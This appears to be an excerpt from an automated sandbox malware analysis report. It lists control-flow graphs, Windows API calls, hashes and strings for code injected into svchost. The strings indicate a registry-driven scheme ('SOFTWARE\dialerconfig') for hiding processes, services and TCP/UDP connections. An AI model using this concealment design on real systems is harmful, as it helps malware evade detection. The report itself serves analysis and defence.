                                            • Instruction Fuzzy Hash: 95218172644B80C2EF91CF69A40825EBBA0FBC8B94F554110EE8CA7B25FF79C5428B05
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2970298836.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_26a879c0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 98d8d3de4ce2ba425b96842ab48ec1da97cf51971eb9959754a84dd95e99a7c2
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 89E0C2B1A11A02C6F748DBA6D81835A7EE1EB88B52F49C024C94D07360DF7EC49ACB91

                                            Execution Graph

                                            Execution Coverage:0.6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:0%
                                            Total number of Nodes:72
                                            Total number of Limit Nodes:5
                                            execution_graph 20875 17953d4b860 20877 17953d4b871 _set_errno_from_matherr 20875->20877 20878 17953d4b8c0 20877->20878 20879 17953d4b840 6 API calls _set_errno_from_matherr 20877->20879 20879->20878 20880 179537a1c28 20885 179537a1650 GetProcessHeap HeapAlloc 20880->20885 20882 179537a1c3e Sleep SleepEx 20883 179537a1c37 20882->20883 20883->20882 20884 179537a15c0 StrCmpIW StrCmpW 20883->20884 20884->20883 20929 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20885->20929 20887 179537a1678 20930 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20887->20930 20889 179537a1689 20931 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20889->20931 20891 179537a1692 20932 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 20891->20932 20893 179537a169b 20894 179537a16b6 RegOpenKeyExW 20893->20894 20895 179537a16e8 RegOpenKeyExW 20894->20895 20896 179537a18ce 20894->20896 20897 179537a1711 20895->20897 20898 179537a1727 RegOpenKeyExW 20895->20898 20896->20883 20933 179537a12c8 16 API calls 20897->20933 20899 179537a1762 RegOpenKeyExW 20898->20899 20900 179537a174b 20898->20900 20903 179537a1786 20899->20903 20904 179537a179d RegOpenKeyExW 20899->20904 20934 179537a104c 6 API calls 20900->20934 20935 179537a12c8 16 API calls 20903->20935 20908 179537a17c1 20904->20908 20909 179537a17d8 RegOpenKeyExW 20904->20909 20905 179537a171d RegCloseKey 20905->20898 20906 179537a1758 RegCloseKey 20906->20899 20936 179537a12c8 16 API calls 20908->20936 20912 179537a1813 RegOpenKeyExW 20909->20912 20913 179537a17fc 20909->20913 20910 179537a1793 RegCloseKey 20910->20904 20914 179537a1837 20912->20914 20915 179537a184e RegOpenKeyExW 20912->20915 20937 179537a12c8 16 API calls 20913->20937 20938 179537a104c 6 API calls 20914->20938 20919 179537a1872 20915->20919 20920 179537a1889 RegOpenKeyExW 20915->20920 20916 179537a17ce RegCloseKey 20916->20909 20939 179537a104c 6 API calls 20919->20939 20924 179537a18c4 RegCloseKey 20920->20924 20925 179537a18ad 20920->20925 20921 179537a1809 RegCloseKey 20921->20912 20922 179537a1844 RegCloseKey 20922->20915 20924->20896 20940 179537a104c 6 API calls 20925->20940 20926 179537a187f RegCloseKey 20926->20920 20928 179537a18ba RegCloseKey 20928->20924 20929->20887 20930->20889 20931->20891 20932->20893 20933->20905 20934->20906 20935->20910 20936->20916 20937->20921 20938->20922 20939->20926 20940->20928 20941 179537aa568 20942 179537aa581 20941->20942 20951 179537aa57d 20941->20951 20953 179537acc38 28 API calls 20942->20953 20944 179537aa586 20954 179537ad130 GetEnvironmentStringsW 20944->20954 20946 179537aa593 20970 179537ab8d8 7 API calls _set_errno_from_matherr 20946->20970 20949 179537aa5a0 20969 179537ab8d8 7 API calls _set_errno_from_matherr 20949->20969 20953->20944 20955 179537ad202 20954->20955 20956 179537ad15e 20954->20956 20957 179537aa58b 20955->20957 20958 179537ad20a FreeEnvironmentStringsW 20955->20958 20971 179537ad080 WideCharToMultiByte 20956->20971 20957->20946 20968 179537aa5d4 17 API calls 4 library calls 20957->20968 20958->20957 20968->20949 20969->20946 20970->20951 20972 17953772908 20974 17953772936 20972->20974 20973 17953772a2b LoadLibraryA 20973->20974 20974->20973 20975 17953772aa7 20974->20975

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction ID: 6e7ad4a23ee113c94972afa18e5892f6c1cf9dab88b3806c5c8dc1af32ac5ff3
                                            • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                            • Instruction Fuzzy Hash: 2AE039B1A11A14C6F7058BA2D82438937F5EB89B06F488024C90907350EF7D84D9C740

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: 23a82a55378c246d0ec841d76e9cecdd68e5164837a20dfb0eba84c5fef6eec4
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: FE115B71E3C63182F7639BA1B8563E923F0EB5670DF54012B9A4E86B94EF39C08CC650

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free
                                            • String ID:
                                            • API String ID: 3328510275-0
                                            • Opcode ID: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                            • Instruction ID: 79042b1d93504cc8c4419d3936fb3a924f44f0128a7a967f3d6c629648fc6a81
                                            • Opcode Fuzzy Hash: 6655d75d81b3f5d3cdd8ffb71a0db4099f6c7b3c7a68dca63c88ca8711a21244
                                            • Instruction Fuzzy Hash: 8F21CC31F28BA481E6219F16A45029AB7B4F78AFD4F4D4126DF9D63BD4DF38C5568300

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 00000179537A1650: GetProcessHeap.KERNEL32 ref: 00000179537A165B
                                              • Part of subcall function 00000179537A1650: HeapAlloc.KERNEL32 ref: 00000179537A166A
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A16DA
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1707
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1721
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1741
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A175C
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A177C
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1797
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17B7
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A17D2
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A17F2
                                            • Sleep.KERNEL32 ref: 00000179537A1C43
                                            • SleepEx.KERNELBASE ref: 00000179537A1C49
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A180D
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A182D
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1848
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A1868
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A1883
                                              • Part of subcall function 00000179537A1650: RegOpenKeyExW.ADVAPI32 ref: 00000179537A18A3
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18BE
                                              • Part of subcall function 00000179537A1650: RegCloseKey.ADVAPI32 ref: 00000179537A18C8
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: d488d6aa4593b88235e9775f50eab7aee9e96ec915b67486a12f707cea035321
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: 65311239B2862191FB529F36E9513EA13F5AB46BDCF844023DE0F977D6EE24C858C250

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 81 179537a3930-179537a393b 82 179537a3955-179537a395c 81->82 83 179537a393d-179537a3950 StrCmpNIW 81->83 83->82 84 179537a3952 83->84 84->82
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: dialer
                                            • API String ID: 0-3528709123
                                            • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction ID: 3f8ff65858361c2d21231e026d063f1c7926eae38b6c62a91ddaf41afc421b43
                                            • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                            • Instruction Fuzzy Hash: 00D0A730B2961B86FF66DFE188E16E02370EB0670CF448033CA0902714EB198DCDCB10

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 85 17953772908-17953772973 call 17953770f34 * 4 94 17953772b8b 85->94 95 17953772979-1795377297c 85->95 96 17953772b8d-17953772ba9 94->96 95->94 97 17953772982-17953772985 95->97 97->94 98 1795377298b-1795377298e 97->98 98->94 99 17953772994-179537729b2 98->99 99->94 101 179537729b8-179537729dc call 17953770d6c 99->101 104 179537729de-17953772a09 call 17953770d6c 101->104 105 17953772a0b-17953772a12 101->105 104->105 107 17953772a18-17953772a25 105->107 108 17953772ab2-17953772ab9 105->108 107->108 112 17953772a2b-17953772a39 LoadLibraryA 107->112 109 17953772abf-17953772ad6 108->109 110 17953772b6c-17953772b89 108->110 109->110 113 17953772adc 109->113 110->96 114 17953772a9d-17953772aa5 112->114 115 17953772a3b-17953772a45 112->115 117 17953772ae2-17953772af7 113->117 114->112 119 17953772aa7-17953772aac 114->119 118 17953772a48-17953772a4c 115->118 120 17953772b5b-17953772b66 117->120 121 17953772af9-17953772b0a 117->121 122 17953772a4e-17953772a52 118->122 123 17953772a9a 118->123 119->108 120->110 120->117 125 17953772b0c-17953772b13 121->125 126 17953772b15-17953772b19 121->126 127 17953772a7d-17953772a87 122->127 128 17953772a54-17953772a7b 122->128 123->114 129 17953772b48-17953772b59 125->129 130 17953772b1b-17953772b22 126->130 131 17953772b24-17953772b28 126->131 132 17953772a8d-17953772a98 127->132 128->132 129->120 129->121 130->129 133 17953772b3a-17953772b3e 131->133 134 17953772b2a-17953772b38 131->134 132->118 133->129 135 17953772b40-17953772b43 133->135 134->129 135->129
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2966408858.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953770000_svchost.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 003fea010ce0f30714eb2280857b421f9bd90d63a9d1c744e4eabe7933ad54f1
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: B0612432B0566187EB6ACF15D4847ACB3E1FB46B98F548026DE2D07795EB38E857CB00

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: AllocHeap
                                            • String ID:
                                            • API String ID: 4292702814-0
                                            • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                            • Instruction ID: ed5e70f076aeb2440185d0008e8c9ef1798c9f1a849db7fb2039aa7b8fb8141a
                                            • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                            • Instruction Fuzzy Hash: 05F0B47230922541FF576F6298003E513B06F68B4CF0C48338D8E863C2EEADC44C4310

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 351 179537a2cdc-179537a2d55 call 179537becc0 354 179537a2d5b-179537a2d61 351->354 355 179537a3090-179537a30b3 351->355 354->355 356 179537a2d67-179537a2d6a 354->356 356->355 357 179537a2d70-179537a2d73 356->357 357->355 358 179537a2d79-179537a2d89 GetModuleHandleA 357->358 359 179537a2d8b-179537a2d9b call 179537b3090 358->359 360 179537a2d9d 358->360 362 179537a2da0-179537a2dbe 359->362 360->362 362->355 365 179537a2dc4-179537a2de3 StrCmpNIW 362->365 365->355 366 179537a2de9-179537a2ded 365->366 366->355 367 179537a2df3-179537a2dfd 366->367 367->355 368 179537a2e03-179537a2e0a 367->368 368->355 369 179537a2e10-179537a2e23 368->369 370 179537a2e33 369->370 371 179537a2e25-179537a2e31 369->371 372 179537a2e36-179537a2e3a 370->372 371->372 373 179537a2e3c-179537a2e48 372->373 374 179537a2e4a 372->374 375 179537a2e4d-179537a2e57 373->375 374->375 376 179537a2f4d-179537a2f51 375->376 377 179537a2e5d-179537a2e60 375->377 378 179537a3082-179537a308a 376->378 379 179537a2f57-179537a2f5a 376->379 380 179537a2e72-179537a2e7c 377->380 381 179537a2e62-179537a2e6f call 179537a1a14 377->381 378->355 378->369 384 179537a2f6b-179537a2f75 379->384 385 179537a2f5c-179537a2f68 call 179537a1a14 379->385 382 179537a2eb0-179537a2eba 380->382 383 179537a2e7e-179537a2e8b 380->383 381->380 389 179537a2ebc-179537a2ec9 382->389 390 179537a2eea-179537a2eed 382->390 383->382 388 179537a2e8d-179537a2e9a 383->388 392 179537a2f77-179537a2f84 384->392 393 179537a2fa5-179537a2fa8 384->393 385->384 396 179537a2e9d-179537a2ea3 388->396 389->390 397 179537a2ecb-179537a2ed8 389->397 398 179537a2efb-179537a2f08 lstrlenW 390->398 399 179537a2eef-179537a2ef9 call 179537a1d28 390->399 392->393 401 179537a2f86-179537a2f93 392->401 394 179537a2fb5-179537a2fc2 lstrlenW 393->394 395 179537a2faa-179537a2fb3 call 179537a1d28 393->395 408 179537a2fc4-179537a2fce 394->408 409 179537a2fe5-179537a2fef call 179537a3930 394->409 395->394 413 179537a2ffa-179537a3005 395->413 406 179537a2f43-179537a2f48 396->406 407 179537a2ea9-179537a2eae 396->407 410 179537a2edb-179537a2ee1 397->410 402 179537a2f2b-179537a2f3d call 179537a3930 398->402 403 179537a2f0a-179537a2f14 398->403 399->398 399->406 404 179537a2f96-179537a2f9c 401->404 402->406 417 179537a2ff2-179537a2ff4 402->417 403->402 412 179537a2f16-179537a2f29 call 179537a1554 403->412 404->413 414 179537a2f9e-179537a2fa3 404->414 406->417 407->382 407->396 408->409 418 179537a2fd0-179537a2fe3 call 179537a1554 408->418 409->417 410->406 419 179537a2ee3-179537a2ee8 410->419 412->402 412->406 422 179537a3007-179537a300b 413->422 423 179537a307c-179537a3080 413->423 414->393 414->404 417->378 417->413 418->409 418->413 419->390 419->410 428 179537a3013-179537a302d call 179537a86a0 422->428 429 179537a300d-179537a3011 422->429 423->378 432 179537a3030-179537a3033 428->432 429->428 429->432 435 179537a3035-179537a3053 call 179537a86a0 432->435 436 179537a3056-179537a3059 432->436 435->436 436->423 438 179537a305b-179537a3079 call 179537a86a0 436->438 438->423
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 49fe3da7658472f80655a8590b1efea23276f7a9504431454da11e10ce33b624
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 8CB1CF32A28A6482FB6A8F65D4547E9A3B5F746B8CF545017EE4D53B94EF34CC88C340

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 442 17953d42cdc-17953d42d55 call 17953d5ecc0 445 17953d43090-17953d430b3 442->445 446 17953d42d5b-17953d42d61 442->446 446->445 447 17953d42d67-17953d42d6a 446->447 447->445 448 17953d42d70-17953d42d73 447->448 448->445 449 17953d42d79-17953d42d89 GetModuleHandleA 448->449 450 17953d42d9d 449->450 451 17953d42d8b-17953d42d9b GetProcAddress 449->451 452 17953d42da0-17953d42dbe 450->452 451->452 452->445 454 17953d42dc4-17953d42de3 StrCmpNIW 452->454 454->445 455 17953d42de9-17953d42ded 454->455 455->445 456 17953d42df3-17953d42dfd 455->456 456->445 457 17953d42e03-17953d42e0a 456->457 457->445 458 17953d42e10-17953d42e23 457->458 459 17953d42e25-17953d42e31 458->459 460 17953d42e33 458->460 461 17953d42e36-17953d42e3a 459->461 460->461 462 17953d42e4a 461->462 463 17953d42e3c-17953d42e48 461->463 464 17953d42e4d-17953d42e57 462->464 463->464 465 17953d42f4d-17953d42f51 464->465 466 17953d42e5d-17953d42e60 464->466 467 17953d42f57-17953d42f5a 465->467 468 17953d43082-17953d4308a 465->468 469 17953d42e72-17953d42e7c 466->469 470 17953d42e62-17953d42e6f call 17953d41a14 466->470 471 17953d42f6b-17953d42f75 467->471 472 17953d42f5c-17953d42f68 call 17953d41a14 467->472 468->445 468->458 474 17953d42e7e-17953d42e8b 469->474 475 17953d42eb0-17953d42eba 469->475 470->469 479 17953d42fa5-17953d42fa8 471->479 480 17953d42f77-17953d42f84 471->480 472->471 474->475 482 17953d42e8d-17953d42e9a 474->482 476 17953d42eea-17953d42eed 475->476 477 17953d42ebc-17953d42ec9 475->477 484 17953d42eef-17953d42ef9 call 17953d41d28 476->484 485 17953d42efb-17953d42f08 lstrlenW 476->485 477->476 483 17953d42ecb-17953d42ed8 477->483 488 17953d42faa-17953d42fb3 call 17953d41d28 479->488 489 17953d42fb5-17953d42fc2 lstrlenW 479->489 480->479 487 17953d42f86-17953d42f93 480->487 490 17953d42e9d-17953d42ea3 482->490 493 17953d42edb-17953d42ee1 483->493 484->485 500 17953d42f43-17953d42f48 484->500 495 17953d42f0a-17953d42f14 485->495 496 17953d42f2b-17953d42f3d call 17953d43930 485->496 497 17953d42f96-17953d42f9c 487->497 488->489 508 17953d42ffa-17953d43005 488->508 491 17953d42fe5-17953d42fef call 17953d43930 489->491 492 17953d42fc4-17953d42fce 489->492 499 17953d42ea9-17953d42eae 490->499 490->500 502 17953d42ff2-17953d42ff4 491->502 492->491 501 17953d42fd0-17953d42fe3 call 17953d41554 492->501 493->500 503 17953d42ee3-17953d42ee8 493->503 495->496 506 17953d42f16-17953d42f29 call 17953d41554 495->506 496->500 496->502 507 17953d42f9e-17953d42fa3 497->507 497->508 499->475 499->490 500->502 501->491 501->508 502->468 502->508 503->476 503->493 506->496 506->500 507->479 507->497 513 17953d4307c-17953d43080 508->513 514 17953d43007-17953d4300b 508->514 513->468 518 17953d4300d-17953d43011 514->518 519 17953d43013-17953d4302d call 17953d486a0 514->519 518->519 521 17953d43030-17953d43033 518->521 519->521 524 17953d43035-17953d43053 call 17953d486a0 521->524 525 17953d43056-17953d43059 521->525 524->525 525->513 527 17953d4305b-17953d43079 call 17953d486a0 525->527 527->513
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 98bcc10a1d13680acb4732322f851b0dccb3f31070d55a33c753f57472592aee
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: CDB17E72218AB082EB6A9F6AD4407E9A3B4FB44B8CF545027EE4D53B94DFB5CD58C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: e8bfa415f41d31c475037110bcc008507386401fbc5a7cc04ea91d7088d21a7c
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 25317072618B9096EB618FA0E8507EE7371F789748F44442BDA4D47B98EF38C64CC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 9ae1a63d25a466f5e47e171da770538db26f358e0c8647ac2f9f06c02c70e1b6
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 57316072209B909AEB619F60E8407ED73B4F794748F44452BDA5E47B98EF78C64CC710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: ba80b338ea6e5c069091e1c0105fe7063c03fcc6fd82a0caca0eb8104bb9595a
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 17319E32618F9096EB61CF65E8503DE73B4F78A758F540126EA9D43BA8EF38C549CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 97b7bee9a0292e194b785b80e9bb23aa859324820fdf5215c23d676d039cdd79
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: CC315C32218F9086EB61CF65E8403DE73B4F798798F540126EA9D47BA9DF78C659CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: ee1056d205be9449170eb33c58af6fcd7c72c5137feb072d1d733fa74b030031
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 16E1FF32B18AA09AE712CF64D4942DE7BB1F34678CF144517EE8E57B99EB38C51AC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2971722933.0000017953D40000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953D40000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_17953d40000_svchost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: 3e79a1f4e444d1215e756465a9d7d2c36ed9f47f4af8cafd44822515662ecaf4
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 19E1CC72B18AA09AE712CF64D4842EE7BB1F3457CCF148516EE8E57B99DA38C51AC700

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2967519655.00000179537A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_179537a0000_svchost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: 4a52f6432ecd7d29496339e7aee66de67061697f76576b81f9c784fbe780843a
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: D7710D36B14A6885FB129F66E8606D937B5FB86B8CF405122DE4D57B68EF38C489C700

                                            Control-flow Graph

